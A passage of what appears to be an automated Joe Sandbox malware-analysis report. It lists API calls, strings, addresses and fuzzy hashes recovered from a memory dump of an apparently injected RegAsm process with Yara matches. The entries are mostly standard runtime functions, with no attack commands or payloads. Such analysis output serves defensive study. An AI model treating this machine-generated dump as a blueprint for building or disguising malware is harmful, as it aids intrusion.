                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0041E661
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale
                                                                            • String ID: utf8
                                                                            • API String ID: 3736152602-905460609
                                                                            • Opcode ID: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
                                                                            • Instruction ID: d369d087f973f2c2e7390e19339e1b86590d8fa7fa541369cb1b30fd3d4077c9
                                                                            • Opcode Fuzzy Hash: 2152daac5f42ae25a129a23ac8d896ce75da55d7df13b3f6dfbcda70826a3db5
                                                                            • Instruction Fuzzy Hash: B0F0F436A10105ABC714AF25DC45FFA73A8EB84324F40007EAA02D7281EA78AD418758
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • EnumSystemLocalesW.KERNEL32(0041EA78,00000001,45F1B473,?,-00000050,?,0041EE1A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7E4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
                                                                            • Instruction ID: 0c0c1f316863ef4a6d30beb722119c93d5a9d1266b3f20af8045389666d513f6
                                                                            • Opcode Fuzzy Hash: 7822a5e4b117a09642d2d9f73cbe77476052005b15321de9f48d0f235ef5c92f
                                                                            • Instruction Fuzzy Hash: BDF0C23A2003045FEB249F3A9881ABABB95FF80368F15442EFD568B690D6759C82C718
                                                                            APIs
                                                                              • Part of subcall function 0040E0C6: EnterCriticalSection.KERNEL32(?,?,00412EDC,00000000,00432B68,0000000C,00412EA3,0000000C,?,004140C7,0000000C,?,004152D9,00000001,00000364,?), ref: 0040E0D5
                                                                            • EnumSystemLocalesW.KERNEL32(0041412B,00000001,00432BE8,0000000C,0041455A,00000000), ref: 00414170
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                            • String ID:
                                                                            • API String ID: 1272433827-0
                                                                            • Opcode ID: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
                                                                            • Instruction ID: 198ab3507c4040aae18c9164df511e00e81c972c753b4360ebc7eca8a0771405
                                                                            • Opcode Fuzzy Hash: 80f246e533dc21f73d9613eff5259b5841ca6d0f841dd3ce2907f16627d73c59
                                                                            • Instruction Fuzzy Hash: 14F03C72A14204DFD710EF99E842B9C77B0FB84725F10422BE811DB2A0C7B959409B98
                                                                            APIs
                                                                              • Part of subcall function 0041513B: GetLastError.KERNEL32(?,00000008,004176BA), ref: 0041513F
                                                                              • Part of subcall function 0041513B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151E1
                                                                            • EnumSystemLocalesW.KERNEL32(0041E60D,00000001,45F1B473,?,?,0041EE78,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6EB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem
                                                                            • String ID:
                                                                            • API String ID: 2417226690-0
                                                                            • Opcode ID: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
                                                                            • Instruction ID: d7e3b5c502124c080ac9a43a58f0728b4bb26e435a168ea3e401fe3e83efba30
                                                                            • Opcode Fuzzy Hash: 8c2aaa4c0cd0d54cc735e91a7a0ddb58f51471a544283acf310fccb30414098b
                                                                            • Instruction Fuzzy Hash: A9F0E53A30025597CB149F3AD8557AABF94EFD1724F87405AEE06CB250C6799883C758
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A47,?,20001004,00000000,00000002,?,?,00412049), ref: 00414692
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
                                                                            • Instruction ID: f9bd5592f4a27906ba0b7000611c056f456b6c13901b9127fc06cc884ae94f8f
                                                                            • Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
                                                                            • Instruction Fuzzy Hash: 63E04F31540268BBCF122F61DC04EEE3F19FF85761F064026FC1566261CB7A9D61AA9D
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00007C6F,00407287), ref: 00407C68
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
                                                                            • Instruction ID: 0ff61591fe6e7fdbf664e27eab8a47433d3f920744837751a1e33914f5cec1be
                                                                            • Opcode Fuzzy Hash: 91f082824127807ca67e9bea16e4e1142dcaa675fdc02378074aa91e014118a9
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
                                                                            • Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
                                                                            • Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
                                                                            • Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
                                                                            • Instruction ID: ed00e364353b2709b8c4936f7de79ec0fff9d1aa87bc6e08b7c0caa285f9e44e
                                                                            • Opcode Fuzzy Hash: fa0ba1e5d9a22f7c6db1b863d068fd7604d8ca8b2c2046f773a74d09f23aaf89
                                                                            • Instruction Fuzzy Hash: 73E04632911268EBCB18DB89C95898AB2ACEB44B04B15009AF902D3210C274DE80C7D4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
                                                                            • Instruction ID: 9d670eee6a7ff43784672fcc557034ad53df9d6dcb31fc26035e34de67efaf71
                                                                            • Opcode Fuzzy Hash: eafc9afbd71d0c63c25bd700d152b00fba6a1b79f89aedc9458559ba3c3e83a7
                                                                            • Instruction Fuzzy Hash: 6EC08C3420098046CF29CE10C2713EA33D5A392B82F80098ECA0A0F752CA1E9CC2DA44
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404B4C
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404B69
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404B8D
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404BB8
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00404C2A
                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C7F
                                                                            • __Getctype.LIBCPMT ref: 00404C96
                                                                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CD6
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00404D78
                                                                            • std::_Facet_Register.LIBCPMT ref: 00404D7E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                                                                            • String ID: bad locale name
                                                                            • API String ID: 103145292-1405518554
                                                                            • Opcode ID: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
                                                                            • Instruction ID: c45789c66640c356b2bc41b45c406846e681c44b1f4b151baf81fb86c109fe15
                                                                            • Opcode Fuzzy Hash: 07779c633be37db408639f77928584da0fe84fd984f841e2fd8ba1ab6a6bcfd4
                                                                            • Instruction Fuzzy Hash: 7B619FB19043408BD720DF65D941B5BB7F4AFD4304F05493EE989A7392E738E948CB5A
                                                                            APIs
                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0040AAB7
                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0040ABC5
                                                                            • _UnwindNestedFrames.LIBCMT ref: 0040AD17
                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0040AD32
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                            • String ID: csm$csm$csm$hqB
                                                                            • API String ID: 2751267872-961717235
                                                                            • Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
                                                                            • Instruction ID: 1a84720c735a061b690d6f447b3278b908e1dcb1436106e9bb87ee9a1a6810cd
                                                                            • Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
                                                                            • Instruction Fuzzy Hash: 2DB18A718003099FDF14DFA5C9809AEBBB5FF14304B19456BE8017B282C739DA61CF9A
                                                                            APIs
                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042485F), ref: 00422D5B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DecodePointer
                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                            • API String ID: 3527080286-3064271455
                                                                            • Opcode ID: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
                                                                            • Instruction ID: 541d14d2076966b173cd57405107be29c5c83d47e8039af315078564b0fddfcc
                                                                            • Opcode Fuzzy Hash: 99bc9cc3bdd9136b520063792197f245364da15bbda7aca5a31b7bed04557963
                                                                            • Instruction Fuzzy Hash: 76514371B0062AEBCB108F59FA4C1AEBBB0FB45304F924057D480A6354CBBD8925EB5E
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407190
                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 0040719E
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071AF
                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                            • API String ID: 667068680-1247241052
                                                                            • Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
                                                                            • Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
                                                                            • Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
                                                                            • Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C
                                                                            APIs
                                                                            • GetCPInfo.KERNEL32(0160CBE8,0160CBE8,?,7FFFFFFF,?,004245F3,0160CBE8,0160CBE8,?,0160CBE8,?,?,?,?,0160CBE8,?), ref: 004243C9
                                                                            • __alloca_probe_16.LIBCMT ref: 00424484
                                                                            • __alloca_probe_16.LIBCMT ref: 00424513
                                                                            • __freea.LIBCMT ref: 0042455E
                                                                            • __freea.LIBCMT ref: 00424564
                                                                            • __freea.LIBCMT ref: 0042459A
                                                                            • __freea.LIBCMT ref: 004245A0
                                                                            • __freea.LIBCMT ref: 004245B0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                            • String ID:
                                                                            • API String ID: 127012223-0
                                                                            • Opcode ID: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
                                                                            • Instruction ID: b3b1fd3be87dc675253da9249cad55eb0a70a834b65d1a532299ad71412a1fff
                                                                            • Opcode Fuzzy Hash: 8a56644c9f658ced4a7fecf9f58cf2b799a0c4498a4b3962048a55bd8390d3ba
                                                                            • Instruction Fuzzy Hash: 24711872B00625ABDF20AE64AC41BAF77B5DFC5314F94005BEA44A7381D73CDC8187A9
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,3037F390,?,0041440E,004038E3,?,?,00000000), ref: 004143C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 3664257935-537541572
                                                                            • Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
                                                                            • Instruction ID: 9d281342414512710d521e2bc5e8bd8d189b06f0c9bb1d1e4d3acc3ca9f27be4
                                                                            • Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
                                                                            • Instruction Fuzzy Hash: 9E21F371B41219ABCB219B61AC41F9B77589F817B4F250222ED26A73C0D738ED42C6D8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
                                                                            • Instruction ID: 9d2747a7e5b70225cc448f1b3832819408a251e63c6cb1e4317f51345b07cf5e
                                                                            • Opcode Fuzzy Hash: 34dfbc0b19412f8332e2df089f070eab11bf50ad423d98e1f5d4bef1ead3c863
                                                                            • Instruction Fuzzy Hash: B9B1E870B00215BFDB11DF59D980BAE7BB1BF45304F94816AE401AB392C7B99D42CB69
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,0040A621,00408D5A,00407CB3), ref: 0040A638
                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A646
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A65F
                                                                            • SetLastError.KERNEL32(00000000,0040A621,00408D5A,00407CB3), ref: 0040A6B1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue___vcrt_
                                                                            • String ID:
                                                                            • API String ID: 3852720340-0
                                                                            • Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
                                                                            • Instruction ID: 78011c5e5d228000ed262031febe4d72c2c7c60d5ad4d387ad9a5ce747099190
                                                                            • Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
                                                                            • Instruction Fuzzy Hash: 530128332093112ED62427B6BD45A5B2678DB51774738063FF510722F1EF7E5C11554D
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3037F390,?,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 004114FD
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0041150F
                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,0042534E,000000FF,?,00411458,?,?,0041142C,00000016), ref: 00411531
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
                                                                            • Instruction ID: 91ec29eb5be505712193f20e889ba6035279a869843729da5c2c1c8d1a6e38dc
                                                                            • Opcode Fuzzy Hash: 5db7edf03dd5c6a86733f78c3fc37fecd77a691f09511d684ccae05772ab5e40
                                                                            • Instruction Fuzzy Hash: 5E018431A50625EBDB218F50DC09BAEB7F9FB44B11F400526F912A22A0DB789900CA58
                                                                            APIs
                                                                            • __alloca_probe_16.LIBCMT ref: 00418F38
                                                                            • __alloca_probe_16.LIBCMT ref: 00418FF9
                                                                            • __freea.LIBCMT ref: 00419060
                                                                              • Part of subcall function 00415426: HeapAlloc.KERNEL32(00000000,?,?,?,00407448,?,?,004038E3,0000000C), ref: 00415458
                                                                            • __freea.LIBCMT ref: 00419075
                                                                            • __freea.LIBCMT ref: 00419085
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                            • String ID:
                                                                            • API String ID: 1096550386-0
                                                                            • Opcode ID: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
                                                                            • Instruction ID: 5a58541e407446bb28ced3c61191459bbd43b91e1c19ac61a4b7f941500e9d67
                                                                            • Opcode Fuzzy Hash: b34ec7378ed80fdedf5b3cd9fd74b686b7ca20f323847e8b562edae9002d46d2
                                                                            • Instruction Fuzzy Hash: 1451E572600206AFDB249E65CC81EFB3AA9EF48754B15012EFD05D7250EB39DD81C7A9
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 00405A30
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00405A3A
                                                                              • Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
                                                                              • Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9
                                                                            • codecvt.LIBCPMT ref: 00405A74
                                                                            • std::_Facet_Register.LIBCPMT ref: 00405A8B
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00405AAB
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                            • String ID:
                                                                            • API String ID: 712880209-0
                                                                            • Opcode ID: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
                                                                            • Instruction ID: b96a9e16e5313ba5d76a5da041c455aafda494eca7322fa8897946df384a052d
                                                                            • Opcode Fuzzy Hash: 08d409ab8f65cfa251cbcb9404e233e286c333acaa76841f7ef905a91d8db047
                                                                            • Instruction Fuzzy Hash: 7C01AD75A00A168BCB05EB65C881AAF7771EF84354F24052EE414BB3D2CB3CAE058F99
                                                                            APIs
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00401F9D
                                                                              • Part of subcall function 00408090: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407FAB,?,?,?,?,00407FAB,0000000C,00432FA4,0000000C), ref: 004080F0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionRaise___std_exception_copy
                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                            • API String ID: 3109751735-1866435925
                                                                            • Opcode ID: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
                                                                            • Instruction ID: 39c8128b798e2086e3302e8ab46e2dce8cada1f1b911e2d41b88b79c7a5bec65
                                                                            • Opcode Fuzzy Hash: 6db5754c0c3f7c630e456a44fc8a01ec81c9786fca09fcb0a19a2d9224875447
                                                                            • Instruction Fuzzy Hash: BD1136B29107156BC710DF68D801B86B3E8AF08310F14853FFA54E7291F778E804CBA9
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DA8
                                                                            • ___raise_securityfailure.LIBCMT ref: 00407E90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                            • String ID: #7@$@SC
                                                                            • API String ID: 3761405300-54278199
                                                                            • Opcode ID: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
                                                                            • Instruction ID: 0d92a2c854cdd6e88b4d1eeb56e5bf4da0bfe8ec24aca00867b110679a0b03e4
                                                                            • Opcode Fuzzy Hash: be0408e9841c2604ed6c70be4b6810e12912a1b256ed321422f905974070e74f
                                                                            • Instruction Fuzzy Hash: DA2107B4640A00DBD318CF15F9857943BF4BB68355FA0643AE9088B3B1D3B46485CF1E
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B77F
                                                                            • GetLastError.KERNEL32(?,0040B723,00000000,00000001,0043568C,?,?,?,0040B8C6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B67D), ref: 0040B789
                                                                            • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A593), ref: 0040B7B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID: api-ms-
                                                                            • API String ID: 3177248105-2084034818
                                                                            • Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
                                                                            • Instruction ID: 4a96934300341e5ece3864587fe3feae18b3ac400cb1fe2ce3454729e361f76d
                                                                            • Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
                                                                            • Instruction Fuzzy Hash: 29E01A30384208BBEF205B61EC06F5A3E64EB40B85F904031FB0DE91E1E775A9519ACC
                                                                            APIs
                                                                            • GetConsoleOutputCP.KERNEL32(3037F390,00000000,00000000,0040BDB8), ref: 00416525
                                                                              • Part of subcall function 0041B08B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419056,?,00000000,-00000008), ref: 0041B137
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416780
                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167C8
                                                                            • GetLastError.KERNEL32 ref: 0041686B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                            • String ID:
                                                                            • API String ID: 2112829910-0
                                                                            • Opcode ID: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
                                                                            • Instruction ID: 1bb8143dd65314e62236f50c93da9e0a6d801424c5e2e01ca8c3ea5794d6433d
                                                                            • Opcode Fuzzy Hash: 82cd919ffc66cdbec26423ec8f462efebf3297e9721ada9a3fb481d80f0d1854
                                                                            • Instruction Fuzzy Hash: 7DD158B5E002589FCB11DFA9D880AEDBBB5FF48304F19412AE856E7351D734E882CB58
